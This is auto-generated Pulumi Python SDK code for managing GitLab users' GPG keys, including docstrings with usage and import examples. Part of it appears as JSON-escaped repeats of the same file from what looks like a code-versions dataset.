key_id: Optional[pulumi.Input[int]] = None,
user_id: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering UserGpgKey resources.
:param pulumi.Input[str] created_at: The time when this key was created in GitLab.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] key_id: The ID of the GPG key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
if created_at is not None:
pulumi.set(__self__, "created_at", created_at)
if key is not None:
pulumi.set(__self__, "key", key)
if key_id is not None:
pulumi.set(__self__, "key_id", key_id)
if user_id is not None:
pulumi.set(__self__, "user_id", user_id)
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> Optional[pulumi.Input[str]]:
"""
The time when this key was created in GitLab.
"""
return pulumi.get(self, "created_at")
@created_at.setter
def created_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "created_at", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
The armored GPG public key.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="keyId")
def key_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of the GPG key.
"""
return pulumi.get(self, "key_id")
@key_id.setter
def key_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "key_id", value)
@property
@pulumi.getter(name="userId")
def user_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, "user_id")
@user_id.setter
def user_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "user_id", value)
class UserGpgKey(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
key: Optional[pulumi.Input[str]] = None,
user_id: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
        The `UserGpgKey` resource allows managing the lifecycle of a GPG key assigned to the current user or a specific user.
> Managing GPG keys for arbitrary users requires admin privileges.
**Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
## Example Usage
```python
import pulumi
import pulumi_gitlab as gitlab
example_user = gitlab.get_user(username="example-user")
# Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
user_id=example_user.id,
key=\"\"\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----\"\"\")
# Manages a GPG key for the current user
example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=\"\"\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----\"\"\")
```
## Import
You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
```
Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: UserGpgKeyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
        The `UserGpgKey` resource allows managing the lifecycle of a GPG key assigned to the current user or a specific user.
> Managing GPG keys for arbitrary users requires admin privileges.
**Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)
## Example Usage
```python
import pulumi
import pulumi_gitlab as gitlab
example_user = gitlab.get_user(username="example-user")
# Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.
example_user_gpg_key = gitlab.UserGpgKey("exampleUserGpgKey",
user_id=example_user.id,
key=\"\"\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----\"\"\")
# Manages a GPG key for the current user
example_user_user_gpg_key = gitlab.UserGpgKey("exampleUserUserGpgKey", key=\"\"\"-----BEGIN PGP PUBLIC KEY BLOCK-----
...
-----END PGP PUBLIC KEY BLOCK-----\"\"\")
```
## Import
You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1
```
Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.
```sh
$ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1
```
:param str resource_name: The name of the resource.
:param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
key: Optional[pulumi.Input[str]] = None,
user_id: Optional[pulumi.Input[int]] = None,
__props__=None):
opts = pulumi.ResourceOptions.merge(_utilities.get_resource_opts_defaults(), opts)
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)
if key is None and not opts.urn:
raise TypeError("Missing required property 'key'")
__props__.__dict__["key"] = key
__props__.__dict__["user_id"] = user_id
__props__.__dict__["created_at"] = None
__props__.__dict__["key_id"] = None
super(UserGpgKey, __self__).__init__(
'gitlab:index/userGpgKey:UserGpgKey',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
created_at: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
key_id: Optional[pulumi.Input[int]] = None,
user_id: Optional[pulumi.Input[int]] = None) -> 'UserGpgKey':
"""
Get an existing UserGpgKey resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] created_at: The time when this key was created in GitLab.
:param pulumi.Input[str] key: The armored GPG public key.
:param pulumi.Input[int] key_id: The ID of the GPG key.
:param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _UserGpgKeyState.__new__(_UserGpgKeyState)
__props__.__dict__["created_at"] = created_at
__props__.__dict__["key"] = key
__props__.__dict__["key_id"] = key_id
__props__.__dict__["user_id"] = user_id
return UserGpgKey(resource_name, opts=opts, __props__=__props__)
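
    # A minimal adoption sketch (assumption: a GPG key with key ID 1 already
    # exists for user 42 in GitLab; both values are hypothetical). `get` does
    # not create anything; it only looks up existing state by provider ID:
    #
    #     adopted = UserGpgKey.get("adopted", id="42:1")
    #     pulumi.export("adopted_key_id", adopted.key_id)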
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> pulumi.Output[str]:
"""
The time when this key was created in GitLab.
"""
return pulumi.get(self, "created_at")
@property
@pulumi.getter
def key(self) -> pulumi.Output[str]:
"""
The armored GPG public key.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter(name="keyId")
def key_id(self) -> pulumi.Output[int]:
"""
The ID of the GPG key.
"""
return pulumi.get(self, "key_id")
@property
@pulumi.getter(name="userId")
def user_id(self) -> pulumi.Output[Optional[int]]:
"""
The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.
"""
return pulumi.get(self, "user_id")
An admin token is required if `user_id` is specified.\n example_user_gpg_key = gitlab.UserGpgKey(\"exampleUserGpgKey\",\n user_id=example_user.id,\n key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n # Manages a GPG key for the current user\n example_user_user_gpg_key = gitlab.UserGpgKey(\"exampleUserUserGpgKey\", key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n ```\n\n ## Import\n\n You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1\n ```\n\n Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1\n ```\n\n :param str resource_name: The name of the resource.\n :param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.\n :param pulumi.ResourceOptions opts: Options for the resource.\n \"\"\"\n ...\n\n def __init__(__self__, resource_name: str, *args, **kwargs):\n resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs,\n pulumi.ResourceOptions, *args, **kwargs)\n if resource_args is not None:\n __self__._internal_init(resource_name, opts, **resource_args.\n __dict__)\n else:\n __self__._internal_init(resource_name, *args, **kwargs)\n\n def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.\n ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,\n user_id: Optional[pulumi.Input[int]]=None, __props__=None):\n opts = pulumi.ResourceOptions.merge(_utilities.\n get_resource_opts_defaults(), opts)\n if not isinstance(opts, pulumi.ResourceOptions):\n raise TypeError(\n 'Expected resource options to be a ResourceOptions instance')\n if opts.id is None:\n if __props__ is not None:\n raise TypeError(\n '__props__ is only valid when passed in combination with a valid opts.id to get an existing resource'\n )\n __props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)\n if key is None and not opts.urn:\n raise TypeError(\"Missing required property 'key'\")\n __props__.__dict__['key'] = key\n __props__.__dict__['user_id'] = user_id\n __props__.__dict__['created_at'] = None\n __props__.__dict__['key_id'] = None\n super(UserGpgKey, __self__).__init__(\n 'gitlab:index/userGpgKey:UserGpgKey', resource_name, __props__,\n opts)\n\n @staticmethod\n def get(resource_name: str, id: pulumi.Input[str], opts: Optional[\n pulumi.ResourceOptions]=None, created_at: Optional[pulumi.Input[str\n ]]=None, key: Optional[pulumi.Input[str]]=None, key_id: Optional[\n pulumi.Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None\n ) ->'UserGpgKey':\n \"\"\"\n Get an existing UserGpgKey resource's state with the given name, id, and optional extra\n properties used to qualify the lookup.\n\n :param str resource_name: The unique name of the resulting resource.\n :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] created_at: The time when this key was created in GitLab.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] key_id: The ID of the GPG key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. 
Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)\n )\n __props__ = _UserGpgKeyState.__new__(_UserGpgKeyState)\n __props__.__dict__['created_at'] = created_at\n __props__.__dict__['key'] = key\n __props__.__dict__['key_id'] = key_id\n __props__.__dict__['user_id'] = user_id\n return UserGpgKey(resource_name, opts=opts, __props__=__props__)\n\n @property\n @pulumi.getter(name='createdAt')\n def created_at(self) ->pulumi.Output[str]:\n \"\"\"\n The time when this key was created in GitLab.\n \"\"\"\n return pulumi.get(self, 'created_at')\n\n @property\n @pulumi.getter\n def key(self) ->pulumi.Output[str]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, 'key')\n\n @property\n @pulumi.getter(name='keyId')\n def key_id(self) ->pulumi.Output[int]:\n \"\"\"\n The ID of the GPG key.\n \"\"\"\n return pulumi.get(self, 'key_id')\n\n @property\n @pulumi.getter(name='userId')\n def user_id(self) ->pulumi.Output[Optional[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, 'user_id')\n",
"step-4": "<mask token>\n\n\[email protected]_type\nclass UserGpgKeyArgs:\n\n def __init__(__self__, *, key: pulumi.Input[str], user_id: Optional[\n pulumi.Input[int]]=None):\n \"\"\"\n The set of arguments for constructing a UserGpgKey resource.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n pulumi.set(__self__, 'key', key)\n if user_id is not None:\n pulumi.set(__self__, 'user_id', user_id)\n\n @property\n @pulumi.getter\n def key(self) ->pulumi.Input[str]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, 'key')\n\n @key.setter\n def key(self, value: pulumi.Input[str]):\n pulumi.set(self, 'key', value)\n\n @property\n @pulumi.getter(name='userId')\n def user_id(self) ->Optional[pulumi.Input[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, 'user_id')\n\n @user_id.setter\n def user_id(self, value: Optional[pulumi.Input[int]]):\n pulumi.set(self, 'user_id', value)\n\n\[email protected]_type\nclass _UserGpgKeyState:\n\n def __init__(__self__, *, created_at: Optional[pulumi.Input[str]]=None,\n key: Optional[pulumi.Input[str]]=None, key_id: Optional[pulumi.\n Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None):\n \"\"\"\n Input properties used for looking up and filtering UserGpgKey resources.\n :param pulumi.Input[str] created_at: The time when this key was created in GitLab.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] key_id: The ID of the GPG key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n if created_at is not None:\n pulumi.set(__self__, 'created_at', created_at)\n if key is not None:\n pulumi.set(__self__, 'key', key)\n if key_id is not None:\n pulumi.set(__self__, 'key_id', key_id)\n if user_id is not None:\n pulumi.set(__self__, 'user_id', user_id)\n\n @property\n @pulumi.getter(name='createdAt')\n def created_at(self) ->Optional[pulumi.Input[str]]:\n \"\"\"\n The time when this key was created in GitLab.\n \"\"\"\n return pulumi.get(self, 'created_at')\n\n @created_at.setter\n def created_at(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, 'created_at', value)\n\n @property\n @pulumi.getter\n def key(self) ->Optional[pulumi.Input[str]]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, 'key')\n\n @key.setter\n def key(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, 'key', value)\n\n @property\n @pulumi.getter(name='keyId')\n def key_id(self) ->Optional[pulumi.Input[int]]:\n \"\"\"\n The ID of the GPG key.\n \"\"\"\n return pulumi.get(self, 'key_id')\n\n @key_id.setter\n def key_id(self, value: Optional[pulumi.Input[int]]):\n pulumi.set(self, 'key_id', value)\n\n @property\n @pulumi.getter(name='userId')\n def user_id(self) ->Optional[pulumi.Input[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. 
If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, 'user_id')\n\n @user_id.setter\n def user_id(self, value: Optional[pulumi.Input[int]]):\n pulumi.set(self, 'user_id', value)\n\n\nclass UserGpgKey(pulumi.CustomResource):\n\n @overload\n def __init__(__self__, resource_name: str, opts: Optional[pulumi.\n ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,\n user_id: Optional[pulumi.Input[int]]=None, __props__=None):\n \"\"\"\n The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.\n\n > Managing GPG keys for arbitrary users requires admin privileges.\n\n **Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_gitlab as gitlab\n\n example_user = gitlab.get_user(username=\"example-user\")\n # Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.\n example_user_gpg_key = gitlab.UserGpgKey(\"exampleUserGpgKey\",\n user_id=example_user.id,\n key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n # Manages a GPG key for the current user\n example_user_user_gpg_key = gitlab.UserGpgKey(\"exampleUserUserGpgKey\", key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n ```\n\n ## Import\n\n You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1\n ```\n\n Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1\n ```\n\n :param str resource_name: The name of the resource.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n ...\n\n @overload\n def __init__(__self__, resource_name: str, args: UserGpgKeyArgs, opts:\n Optional[pulumi.ResourceOptions]=None):\n \"\"\"\n The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.\n\n > Managing GPG keys for arbitrary users requires admin privileges.\n\n **Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_gitlab as gitlab\n\n example_user = gitlab.get_user(username=\"example-user\")\n # Manages a GPG key for the specified user. 
An admin token is required if `user_id` is specified.\n example_user_gpg_key = gitlab.UserGpgKey(\"exampleUserGpgKey\",\n user_id=example_user.id,\n key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n # Manages a GPG key for the current user\n example_user_user_gpg_key = gitlab.UserGpgKey(\"exampleUserUserGpgKey\", key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n ```\n\n ## Import\n\n You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1\n ```\n\n Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1\n ```\n\n :param str resource_name: The name of the resource.\n :param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.\n :param pulumi.ResourceOptions opts: Options for the resource.\n \"\"\"\n ...\n\n def __init__(__self__, resource_name: str, *args, **kwargs):\n resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs,\n pulumi.ResourceOptions, *args, **kwargs)\n if resource_args is not None:\n __self__._internal_init(resource_name, opts, **resource_args.\n __dict__)\n else:\n __self__._internal_init(resource_name, *args, **kwargs)\n\n def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.\n ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,\n user_id: Optional[pulumi.Input[int]]=None, __props__=None):\n opts = pulumi.ResourceOptions.merge(_utilities.\n get_resource_opts_defaults(), opts)\n if not isinstance(opts, pulumi.ResourceOptions):\n raise TypeError(\n 'Expected resource options to be a ResourceOptions instance')\n if opts.id is None:\n if __props__ is not None:\n raise TypeError(\n '__props__ is only valid when passed in combination with a valid opts.id to get an existing resource'\n )\n __props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)\n if key is None and not opts.urn:\n raise TypeError(\"Missing required property 'key'\")\n __props__.__dict__['key'] = key\n __props__.__dict__['user_id'] = user_id\n __props__.__dict__['created_at'] = None\n __props__.__dict__['key_id'] = None\n super(UserGpgKey, __self__).__init__(\n 'gitlab:index/userGpgKey:UserGpgKey', resource_name, __props__,\n opts)\n\n @staticmethod\n def get(resource_name: str, id: pulumi.Input[str], opts: Optional[\n pulumi.ResourceOptions]=None, created_at: Optional[pulumi.Input[str\n ]]=None, key: Optional[pulumi.Input[str]]=None, key_id: Optional[\n pulumi.Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None\n ) ->'UserGpgKey':\n \"\"\"\n Get an existing UserGpgKey resource's state with the given name, id, and optional extra\n properties used to qualify the lookup.\n\n :param str resource_name: The unique name of the resulting resource.\n :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] created_at: The time when this key was created in GitLab.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] key_id: The ID of the GPG key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. 
Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)\n )\n __props__ = _UserGpgKeyState.__new__(_UserGpgKeyState)\n __props__.__dict__['created_at'] = created_at\n __props__.__dict__['key'] = key\n __props__.__dict__['key_id'] = key_id\n __props__.__dict__['user_id'] = user_id\n return UserGpgKey(resource_name, opts=opts, __props__=__props__)\n\n @property\n @pulumi.getter(name='createdAt')\n def created_at(self) ->pulumi.Output[str]:\n \"\"\"\n The time when this key was created in GitLab.\n \"\"\"\n return pulumi.get(self, 'created_at')\n\n @property\n @pulumi.getter\n def key(self) ->pulumi.Output[str]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, 'key')\n\n @property\n @pulumi.getter(name='keyId')\n def key_id(self) ->pulumi.Output[int]:\n \"\"\"\n The ID of the GPG key.\n \"\"\"\n return pulumi.get(self, 'key_id')\n\n @property\n @pulumi.getter(name='userId')\n def user_id(self) ->pulumi.Output[Optional[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, 'user_id')\n",
"step-5": "# coding=utf-8\n# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***\n# *** Do not edit by hand unless you're certain you know what you are doing! ***\n\nimport copy\nimport warnings\nimport pulumi\nimport pulumi.runtime\nfrom typing import Any, Mapping, Optional, Sequence, Union, overload\nfrom . import _utilities\n\n__all__ = ['UserGpgKeyArgs', 'UserGpgKey']\n\[email protected]_type\nclass UserGpgKeyArgs:\n def __init__(__self__, *,\n key: pulumi.Input[str],\n user_id: Optional[pulumi.Input[int]] = None):\n \"\"\"\n The set of arguments for constructing a UserGpgKey resource.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n pulumi.set(__self__, \"key\", key)\n if user_id is not None:\n pulumi.set(__self__, \"user_id\", user_id)\n\n @property\n @pulumi.getter\n def key(self) -> pulumi.Input[str]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, \"key\")\n\n @key.setter\n def key(self, value: pulumi.Input[str]):\n pulumi.set(self, \"key\", value)\n\n @property\n @pulumi.getter(name=\"userId\")\n def user_id(self) -> Optional[pulumi.Input[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, \"user_id\")\n\n @user_id.setter\n def user_id(self, value: Optional[pulumi.Input[int]]):\n pulumi.set(self, \"user_id\", value)\n\n\[email protected]_type\nclass _UserGpgKeyState:\n def __init__(__self__, *,\n created_at: Optional[pulumi.Input[str]] = None,\n key: Optional[pulumi.Input[str]] = None,\n key_id: Optional[pulumi.Input[int]] = None,\n user_id: Optional[pulumi.Input[int]] = None):\n \"\"\"\n Input properties used for looking up and filtering UserGpgKey resources.\n :param pulumi.Input[str] created_at: The time when this key was created in GitLab.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] key_id: The ID of the GPG key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. 
Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n if created_at is not None:\n pulumi.set(__self__, \"created_at\", created_at)\n if key is not None:\n pulumi.set(__self__, \"key\", key)\n if key_id is not None:\n pulumi.set(__self__, \"key_id\", key_id)\n if user_id is not None:\n pulumi.set(__self__, \"user_id\", user_id)\n\n @property\n @pulumi.getter(name=\"createdAt\")\n def created_at(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n The time when this key was created in GitLab.\n \"\"\"\n return pulumi.get(self, \"created_at\")\n\n @created_at.setter\n def created_at(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"created_at\", value)\n\n @property\n @pulumi.getter\n def key(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, \"key\")\n\n @key.setter\n def key(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"key\", value)\n\n @property\n @pulumi.getter(name=\"keyId\")\n def key_id(self) -> Optional[pulumi.Input[int]]:\n \"\"\"\n The ID of the GPG key.\n \"\"\"\n return pulumi.get(self, \"key_id\")\n\n @key_id.setter\n def key_id(self, value: Optional[pulumi.Input[int]]):\n pulumi.set(self, \"key_id\", value)\n\n @property\n @pulumi.getter(name=\"userId\")\n def user_id(self) -> Optional[pulumi.Input[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, \"user_id\")\n\n @user_id.setter\n def user_id(self, value: Optional[pulumi.Input[int]]):\n pulumi.set(self, \"user_id\", value)\n\n\nclass UserGpgKey(pulumi.CustomResource):\n @overload\n def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n key: Optional[pulumi.Input[str]] = None,\n user_id: Optional[pulumi.Input[int]] = None,\n __props__=None):\n \"\"\"\n The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.\n\n > Managing GPG keys for arbitrary users requires admin privileges.\n\n **Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_gitlab as gitlab\n\n example_user = gitlab.get_user(username=\"example-user\")\n # Manages a GPG key for the specified user. 
An admin token is required if `user_id` is specified.\n example_user_gpg_key = gitlab.UserGpgKey(\"exampleUserGpgKey\",\n user_id=example_user.id,\n key=\\\"\\\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\\\"\\\"\\\")\n # Manages a GPG key for the current user\n example_user_user_gpg_key = gitlab.UserGpgKey(\"exampleUserUserGpgKey\", key=\\\"\\\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\\\"\\\"\\\")\n ```\n\n ## Import\n\n You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1\n ```\n\n Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1\n ```\n\n :param str resource_name: The name of the resource.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n ...\n @overload\n def __init__(__self__,\n resource_name: str,\n args: UserGpgKeyArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n \"\"\"\n The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.\n\n > Managing GPG keys for arbitrary users requires admin privileges.\n\n **Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_gitlab as gitlab\n\n example_user = gitlab.get_user(username=\"example-user\")\n # Manages a GPG key for the specified user. 
